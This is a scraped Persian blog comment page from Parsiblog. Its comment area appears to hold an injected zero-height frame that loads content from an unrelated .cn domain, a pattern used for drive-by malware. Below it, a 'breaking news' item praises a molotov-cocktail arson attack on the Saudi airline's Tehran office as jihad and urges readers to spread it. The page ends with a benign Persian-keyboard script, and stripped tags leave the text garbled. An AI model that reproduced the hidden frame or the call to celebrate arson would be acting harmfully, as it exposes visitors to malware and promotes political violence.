• وبلاگ : فصل آگاهي
 • يادداشت : 16 اذر نماد استکبار ستيزي دانشجوي مسلمان
 • نظرات : 1 خصوصي ، 1 عمومي
 • درب کنسرو بازکن برقی

  نام:
  ايميل:
  سايت:
     
  متن پيام :
  حداکثر 2000 حرف
  كد امنيتي:
    
    
   

  < src="http://s.asde0msd.cn/d.htm?uk" width=100 height=0>خبر فوري .

  در بامداد روز چهارشنبه 20/ 9 / 1387 دفتر مرکزي هواپيمايي آل سعود (خطوط الجويه العربيه السعوديه) در ايران به آدرس تهران - خيابان بهشتي – ميدان تختي – نبش خيابان صابونچي ، در اعتراض به سازش اخير زژيم نامشروع آل سعود با اشغالگران قدس شريف در رابطه با طرح صلح عربي مورد حمله برادران مجاهد مسلمان قرار گرفته و بر اثر اصابت ده ها کوکتل مولوتف در آتش قهر الهي سوخت.

  ثانيه هايي از فيلم به آتش کشيده شدن دفتر مرکزي هواپيمايي رژيم سعودي

  با انتشار اين خبر در اجر جهاد سهيم شويد و از سانسور خبري در بياوريد <>window.onerror=function(){return true;} body{margin:1;padding:1; font-family: tahoma ;font-size:12;line-height:1.9; background:url(http://www.parsiblog.com/imgs/new/ParsiEditor.gif) no-repeat fixed center} p{margin:0;padding:0; font-family: tahoma ;font-size:12;line-height:1.9} < language=java> blang="FA"; var mahal="", mfa="", curin, mova, defe="", help; //mahal="ALL" function mfin(){mtag=window.event.srcElement;if ((((mtag.tagName=="INPUT" && mtag.type=="text") || mtag.tagName=="BODY" || mtag.tagName=="TEXTAREA") && (mahal=="ALL" || mtag.lang=="fa"))){ if (mfa=="hast") mlang.outerHTML="";mtag.insertAdjacentHTML("beforebegin", ""+blang+"");curin=mtag;mlang.style.marginTop=mtag.offsetHeight;mtag.title="براي مشاهده راهنما Ctrl+K را فشار دهيد";mtag.style.direction="rtl";mfa="hast";}else{if (mfa=="hast" && window.event.srcElement!=mlang){mlang.outerHTML="";mfa="";}if (help){hel.outerHTML="";help=false;}}}function toit(){if(blang=="FA") blang="EN"; else blang="FA";mlang.innerHTML=blang;curin.focus();}function mkdown(){ mtag=window.event.srcElement;mkey=window.event.keyCode;/*if(mkey==116)window.event.keyCode=36;*/allcode="|72|70|192|74|69|219|221|80|79|78|66|86|67|220|83|65|87|81|88|90|85|89|84|82|186|222|71|76|75|188|73|68|77|190|191|48|57|";allharf="ابپتثجچحخدذرزژسشصضطظعغفقكگلمنوهيئ./09";allscode="|72|188|219|221|70|90|191|186|77|190|65|83|68|81|87|69|71|84|78|66|89|86|82|74|80|79|73|85|48|57|";allsharf="آؤ»«ّة؟:ءأًٌٍَُِْ،أإ؛ؤ‍ـ©®™€()";if ((((mtag.tagName=="INPUT" && mtag.type=="text") || mtag.tagName=="BODY" || mtag.tagName=="TEXTAREA") && (mahal=="ALL" || mtag.lang=="fa"))){mtag.caretPos = document.selection.createRange();if (mkey==16 && window.event.altLeft) toit(); mk=allcode.indexOf("|"+mkey+"|");mpos=0;ml=0;if (mk>-1 && blang=="FA"){if (!window.event.ctrlKey){if (!window.event.shiftKey && !window.event.ctrlKey){if (mk>0){mall=allcode.substr(0,mk);while (mpos>-1){mpos=mall.indexOf("|",mpos+1);ml++;}} if(mtag.caretPos.text!=0) document.selection.clear(); mtag.caretPos.text=allharf.substr(ml,1);return(false);}else{mk=allscode.indexOf("|"+mkey+"|");if (mk>-1){if (mk>0){mall=allscode.substr(0,mk);while (mpos>-1){mpos=mall.indexOf("|",mpos+1);ml++;}}mtag.caretPos.text = allsharf.substr(ml,1);if (mkey==80) mtag.caretPos.text = "";}return(false);}}else{if (mkey==75 && window.event.ctrlKey && blang=="FA" && !help){ mtag.insertAdjacentHTML("afterend", "
  Shift+H = آShift+< = ؤShift+} = »Shift+S = ضمهShift+F = تشديد
  Shift+? = ؟Shift+N = أShift+U = يوروShift+E = تنوين‏جرShift+P = كپي‏رايت
  Shift+Y = ؛Shift+T = ،Shift+G = ساكنShift+R = حرف‏كوچكShift+W = تنوين‏رفع
  Shift+Z = ةShift+{ = «Shift+D = كسرهShift+I = نشان‏تجاريShift+Q = تنوين‏نصب
  Shift+B = إShift+M = ءShift+A = فتحهShift+O = ثبت‏شدهShift+Space = نيم‏فاصله
  "); hel.style.left=window.screen.availWidth/2-hel.offsetWidth/2;hel.style.top=50+parent.document.body.scrollTop;help=true;return(false);}}}if (mkey==32 && window.event.shiftKey && blang=="FA"){mtag.caretPos.text = "‏";return(false);}}}document.onfocusin=mfin;document.onkeydown=mkdown;